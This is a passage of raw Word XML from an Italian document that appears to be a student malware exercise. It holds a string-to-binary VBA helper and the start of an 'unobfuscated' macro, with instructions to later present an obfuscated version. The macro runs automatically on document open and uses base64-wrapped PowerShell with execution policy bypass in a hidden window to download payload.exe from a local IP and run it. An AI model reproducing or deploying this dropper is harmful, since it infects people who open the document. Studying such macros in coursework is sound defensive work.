        <w:t xml:space="preserve">End </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="307E6A1D" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7724E844" w14:textId="3F09416D" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC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>' Converte una stringa in input in dati binari</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D91E2FB" w14:textId="72378CFE" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">Function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>stringaABinario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>s As String) As Variant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BDA914" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    Dim ado As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06819F7E" w14:textId="4716FF8C" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    Set ado = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ADODB.Stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D051CE" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ado.Type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 2 ' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adTypeText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13DF2C0C" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ado.Charset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "us-ascii"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A98486" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ado.Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="494E0369" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ado.WriteText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5C15D" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ado.Position</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937EE0B" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ado.Type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 1 ' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adTypeBinary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11B3ECFF" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stringaABinario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ado.Read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E97B3AD" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ado.Close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5CD4C0CC" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r>
        <w:t xml:space="preserve">    Set ado = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9CE8A" w14:textId="5856784C" w:rsidR="003D71C6" w:rsidRDefault="00B046EC" w:rsidP="003D71C6">
      <w:r>
        <w:t>End Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169A9C8" w14:textId="76BCA4CE" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VBA MACRO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D811E03" w14:textId="29ACF36C" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>In questa sezione dovete presentare il codice della macro prima che venga offuscato, le tecniche adottate per offuscare il codice e il codice della macro offuscato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7FE8B" w14:textId="1E0DDA00" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="003D71C6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t>CODICE MACRO</w:t>
      </w:r>
      <w:r w:rsidR="00B40B24" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NON OFFUSCATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF322E" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>AutoOpen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172510A4" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Dim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> codificato </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>As</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03FC15DC" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>Dim codificato2 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF47D3" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    Dim comandoBase64 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D35E9E" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>comandoDaEseguire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE19BB4" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    Dim comandoDaEseguire2 As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1F2D19" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    Dim shell As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672F658" w14:textId="45EEC862" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    Set shell = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>VBA.CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>WScript.Shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7EFA5F" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>' comando per scaricare il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157DF0F" w14:textId="39A7F5A1" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>codificato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> = EncodeBase64("(New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>('" &amp; "http://192.168.43.209:8000/payload.exe" &amp; "', '" &amp; "C:\Users\</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E38">
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>\Downloads\virus.exe" &amp; "')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53152667" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>' comando per eseguire il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679B859" w14:textId="10825613" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E38">
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>\Downloads\virus.exe'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A22013" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">' Comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> codificato in base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7668B" w14:textId="701369A0" w:rsidR="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007E6D03">
        <w:t>comandoBase64 = "IEX([</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>System.Text.Encoding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C878465" w14:textId="77777777" w:rsidR="001C0B72" w:rsidRPr="007E6D03" w:rsidRDefault="001C0B72" w:rsidP="007E6D03"/>
    <w:p w14:paraId="4615B524" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>' decodifico i due comandi da base64 a normali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D30D54" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>comandoDaEseguire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360105D1" w14:textId="4A8FD845" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    comandoDaEseguire2 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048E77C" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03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 xml:space="preserve">    ' Esegui il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per scaricare il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE3DD0" w14:textId="34A41DB0" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>shell.Run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> "powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>comandoDaEseguire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F651D8" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="00D1660C" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">' Esegui il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per eseguire il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE99EC" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>shell.Run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> "powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve"> Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A53AD07" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721CB85" w14:textId="77777777" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>Rilascio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40B24">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>l'oggetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="264C2D1C" w14:textId="6AC8EC7B" w:rsidR="007E6D03" w:rsidRPr="007E6D03" w:rsidRDefault="007E6D03" w:rsidP="007E6D03">
      <w:r w:rsidRPr="007E6D03">
